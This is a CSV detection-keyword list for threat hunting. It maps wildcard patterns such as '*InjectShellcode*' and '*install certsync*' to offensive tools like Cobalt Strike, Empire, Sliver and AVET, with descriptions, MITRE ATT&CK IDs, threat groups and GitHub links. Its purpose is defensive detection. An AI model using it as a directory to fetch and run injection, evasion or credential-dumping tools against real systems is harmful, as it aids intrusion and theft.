TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectPEWMIFSRemote*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectProc*,offensive_tool_keyword,InjectProc,Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.,T1055 - T1055.012 - T1055.001 - T1055.003,TA0002 - TA0003 - TA0004 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secrary/InjectProc,1,0,N/A,N/A,10,981,225,2019-02-10T11:05:15Z,2017-05-26T08:08:20Z -*injectremote.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Inject-RemoteShellcode*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*inject-shellcode *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*injectShellcode*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an 
advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*InjectShellcode*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*InjectShellCode.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectShellCodeRemote.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectShellCodeWMIFSB64*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*injectsu.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*inligpkjkhbpifecbdjhmdpcfhnlelja*,greyware_tool_keyword,Free One Touch VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*inline_assembly -Assembly *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*inlineAssembly*/execmethod*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*inlineDll*/dll*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*inline-exec.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*inline-execute *,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,0,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*inline-execute *.o*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*inline-execute *tokenprivileges.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - 
T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*inline-execute StartWebClientSvc.x64.o*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,0,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z -*inline-execute*whereami.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*inlineExecute.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - 
TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*InlineExecute-Assembly*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,1,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*InlineShellcode*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*InlineWhispers.py*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z
-*InlineWhispers2*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z
-*Input line too long.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z
-*input/shellcode_enc_raw.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*input/shellcode_raw.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*ins1gn1a/Frampton*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z
-*InsecurePowerShell*,offensive_tool_keyword,InsecurePowerShell,powershell without securities features,T1059 - T1086 - T1117,TA0002 - TA0003 - TA0040,N/A,N/A,Defense Evasion,https://github.com/cobbr/InsecurePowerShell,1,0,N/A,N/A,1,98,18,2017-12-19T03:40:33Z,2017-12-17T02:16:21Z
-*insecurityofthings*jackit*,offensive_tool_keyword,jackit,This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.,T1210 - T1212 - T1560 - T1562,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/insecurityofthings/jackit,1,0,N/A,N/A,8,756,138,2020-10-01T04:37:00Z,2016-07-01T23:21:56Z
-*insert_top_100_passwords_1_G*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*InsidePro-PasswordsPro.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*InspectAssembly.csproj*,offensive_tool_keyword,InspectAssembly,"Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ",T1055.012 - T1027 - T1112,TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*InspectAssembly.exe*,offensive_tool_keyword,InspectAssembly,"Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ",T1055.012 - T1027 - T1112,TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*install powershell-empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z
-*install * roadrecon*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z
-*install amass,offensive_tool_keyword,Amass,In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping,T1593 - T1594 - T1595 - T1567 - T1569,TA0007 - TA0009 - TA0004 - TA0005 - TA0011,N/A,N/A,Information Gathering,https://github.com/OWASP/Amass,1,0,N/A,N/A,10,10153,1759,2023-09-19T11:29:11Z,2018-07-10T16:05:08Z
-*install bloodhound*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z
-*install c2tc-domaininfo*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*install cdn-proxy*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z
-*install certsync*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z
-*install coercer*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z
-*--install -d kali-linux*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,wsl installation,N/A,N/A,N/A,N/A,N/A,N/A
-*install dploot*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z
-*install gobuster*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z
-*install h8mail*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,0,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z
